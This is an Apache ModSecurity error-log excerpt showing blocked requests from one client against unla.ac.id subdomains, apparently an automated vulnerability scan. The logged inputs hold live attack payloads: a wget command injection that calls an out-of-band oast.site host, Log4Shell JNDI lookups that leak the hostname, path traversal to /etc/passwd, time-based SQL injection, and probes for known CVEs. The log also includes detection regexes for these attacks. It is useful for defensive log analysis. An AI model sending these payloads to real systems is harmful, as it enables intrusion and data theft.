"WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO10eMCo-f0AAAO878kAAAAF"]
[Tue Aug 29 11:30:49.347105 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:IP. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:IP: ;wget http:/cjmn8l5jmimk2adbbnlg3gb3fc616jmm9.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/touchlist_sync.cgi"] [unique_id "ZO10ecCo-f0AAAO878wAAAAF"]
[Tue Aug 29 11:30:49.422860 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22ipconfig\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10ecCo-f0AAAOKNrEAAAAK"]
[Tue Aug 29 11:30:50.324469 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  ('orQN'='orQN found within ARGS:password: test') AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND ('orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO10esCo-f0AAAPxBUwAAAAS"]
[Tue Aug 29 11:30:50.379689 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10esCo-f0AAAPxBU0AAAAS"]
[Tue Aug 29 11:30:50.382533 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10esCo-f0AAAPpWfAAAAAI"]
[Tue Aug 29 11:30:50.414325 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10esCo-f0AAAPmhOYAAAAV"]
[Tue Aug 29 11:30:50.415867 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10esCo-f0AAAOKNrUAAAAK"]
[Tue Aug 29 11:30:50.436081 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10esCo-f0AAAOOuZ8AAAAW"]
[Tue Aug 29 11:30:51.315618 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10e8Co-f0AAAOOuaAAAAAW"]
[Tue Aug 29 11:30:51.320695 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  ('orQN'='orQN found within ARGS:password: test') AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND ('orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO10e8Co-f0AAAPPSyQAAAAd"]
[Tue Aug 29 11:30:51.324168 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-268}${:-780}.${hostName}.username.cjmn8l5jmimk2adbbnlg33x9fcc13daje.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/c42api/v3/LoginConfiguration"] [unique_id "ZO10e8Co-f0AAAPmhOgAAAAV"]
[Tue Aug 29 11:30:51.327438 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-268}${:-780}.${hostName}.username.cjmn8l5jmimk2adbbnlg6kwwr16aefegj.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/c42api/v3/LoginConfiguration"] [unique_id "ZO10e8Co-f0AAAPxBVAAAAAS"]
[Tue Aug 29 11:30:51.336196 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-268}${:-780}.${hostName}.username.cjmn8l5jmimk2adbbnlgt3qc4x76t9arc.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/c42api/v3/LoginConfiguration"] [unique_id "ZO10e8Co-f0AAAOOuaEAAAAW"]
[Tue Aug 29 11:30:51.350754 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10e8Co-f0AAAPOhbcAAAAa"]
[Tue Aug 29 11:30:51.351217 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  ('orQN'='orQN found within ARGS:password: test') AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND ('orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO10e8Co-f0AAAPQkhoAAAAe"]
[Tue Aug 29 11:30:51.359481 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10e8Co-f0AAAOOuaIAAAAW"]
[Tue Aug 29 11:30:51.373017 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-268}${:-780}.${hostName}.username.cjmn8l5jmimk2adbbnlgw7bphsc7o4mtu.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/c42api/v3/LoginConfiguration"] [unique_id "ZO10e8Co-f0AAAPxBVIAAAAS"]
[Tue Aug 29 11:30:51.376760 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-268}${:-780}.${hostName}.username.cjmn8l5jmimk2adbbnlgytp693yw9dsmz.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/c42api/v3/LoginConfiguration"] [unique_id "ZO10e8Co-f0AAAPDn1UAAAAP"]
[Tue Aug 29 11:30:51.381270 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  ('orQN'='orQN found within ARGS:password: test') AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND ('orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO10e8Co-f0AAAO879UAAAAF"]
[Tue Aug 29 11:30:51.395035 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  ('orQN'='orQN found within ARGS:password: test') AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND ('orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO10e8Co-f0AAAPxBVMAAAAS"]
[Tue Aug 29 11:30:51.396894 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10e8Co-f0AAAPmhOsAAAAV"]
[Tue Aug 29 11:30:51.399487 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10e8Co-f0AAAPPSyYAAAAd"]
[Tue Aug 29 11:30:51.407296 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  ('orQN'='orQN found within ARGS:password: test') AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND ('orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO10e8Co-f0AAAOOuaQAAAAW"]
[Tue Aug 29 11:30:52.312003 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x00{. found within ARGS:search: =\\x00{.cookie|df0T6L|value=CVE-2014-6287.}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO10fMCo-f0AAAO879cAAAAF"]
[Tue Aug 29 11:30:52.312967 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-268}${:-780}.${hostName}.username.cjmn8l5jmimk2adbbnlghfs1u6m4g5btq.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/c42api/v3/LoginConfiguration"] [unique_id "ZO10fMCo-f0AAAPOhbsAAAAa"]
[Tue Aug 29 11:30:52.335156 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10fMCo-f0AAAOM4Z4AAAAU"]
[Tue Aug 29 11:30:52.356789 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x00{. found within ARGS:search: =\\x00{.cookie|df0T6L|value=CVE-2014-6287.}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO10fMCo-f0AAAPQkh4AAAAe"]
[Tue Aug 29 11:30:52.361335 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x00{. found within ARGS:search: =\\x00{.cookie|df0T6L|value=CVE-2014-6287.}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO10fMCo-f0AAAPxBVYAAAAS"]
[Tue Aug 29 11:30:52.373805 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fMCo-f0AAAPOhb0AAAAa"]
[Tue Aug 29 11:30:52.384925 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fMCo-f0AAAO879oAAAAF"]
[Tue Aug 29 11:30:52.386227 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fMCo-f0AAAP05GYAAAAA"]
